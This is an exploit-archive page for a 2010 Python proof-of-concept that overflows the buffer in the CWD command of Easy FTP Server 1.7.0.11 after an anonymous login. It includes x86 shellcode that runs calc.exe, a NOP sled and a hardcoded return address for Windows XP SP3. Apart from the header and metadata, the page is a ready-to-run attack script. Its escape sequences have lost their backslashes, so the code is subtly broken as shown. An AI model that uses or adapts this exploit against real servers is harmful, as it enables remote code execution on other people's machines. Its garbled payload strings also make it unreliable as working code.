Easy FTP Server v1.7.0.11 CWD Command Remote Buffer Overflow Exploit (Post Auth)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Easy FTP Server v1.7.0.11 CWD Command Remote Buffer Overflow Exploit (Post Auth)
# Published : 2010-07-18
# Author : fdisk
# Previous Title : Struts2/XWork < 2.2.0 Remote Command Execution Vulnerability
# Next Title : Easy FTP Server v1.7.0.11 LIST Command Remote Buffer Overflow Exploit (Post Auth)

# Exploit Title: Easy FTP Server v1.7.0.11 CWD Command Remote Buffer Overflow Exploit (Post Auth) 
# Date: 2010-07-18 
# Author: fdisk
# Software Link: 
# Version: 1.7.0.11
# Tested on: Windows XP SP3 en
# CVE:

import socket
import sys

buffersize = 268

# windows/exec - 227 bytes x86/shikata_ga_nai EXITFUNC=process, CMD=calc.exe
shellcode = ("xb8xf1x18xc7x71xd9xc7x29xc9xb1x33xd9x74x24xf4"
"x5bx31x43x12x83xebxfcx03xb2x16x25x84xc8xcfx20"
"x67x30x10x53xe1xd5x21x41x95x9ex10x55xddxf2x98"
"x1exb3xe6x2bx52x1cx09x9bxd9x7ax24x1cxecx42xea"
"xdex6ex3fxf0x32x51x7ex3bx47x90x47x21xa8xc0x10"
"x2ex1bxf5x15x72xa0xf4xf9xf9x98x8ex7cx3dx6cx25"
"x7ex6dxddx32xc8x95x55x1cxe9xa4xbax7exd5xefxb7"
"xb5xadxeex11x84x4exc1x5dx4bx71xeex53x95xb5xc8"
"x8bxe0xcdx2bx31xf3x15x56xedx76x88xf0x66x20x68"
"x01xaaxb7xfbx0dx07xb3xa4x11x96x10xdfx2dx13x97"
"x30xa4x67xbcx94xedx3cxddx8dx4bx92xe2xcex33x4b"
"x47x84xd1x98xf1xc7xbfx5fx73x72x86x60x8bx7dxa8"
"x08xbaxf6x27x4ex43xddx0cxa0x09x7cx24x29xd4x14"
"x75x34xe7xc2xb9x41x64xe7x41xb6x74x82x44xf2x32"
"x7ex34x6bxd7x80xebx8cxf2xe2x6ax1fx9excax09xa7"
"x05x13")

eip = "x91xC8x41x7E" # CALL EDI - user32.dll
nopsled = "x90" * 16

payload = "x90" * (buffersize-(len(nopsled)+len(shellcode)))

def ExploitEasyFTP(target):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	connect = s.connect((target, 21))
	s.recv(1024)
	s.send('User anonymousrn')
	s.recv(1024)
	s.send('PASS anonymousrn')
	s.send('CWD '+nopsled+shellcode+payload+eip+'rn')
	s.recv(1024)
	s.send('QUIT ftprn')
	s.close()

target = sys.argv[1]

ExploitEasyFTP(target)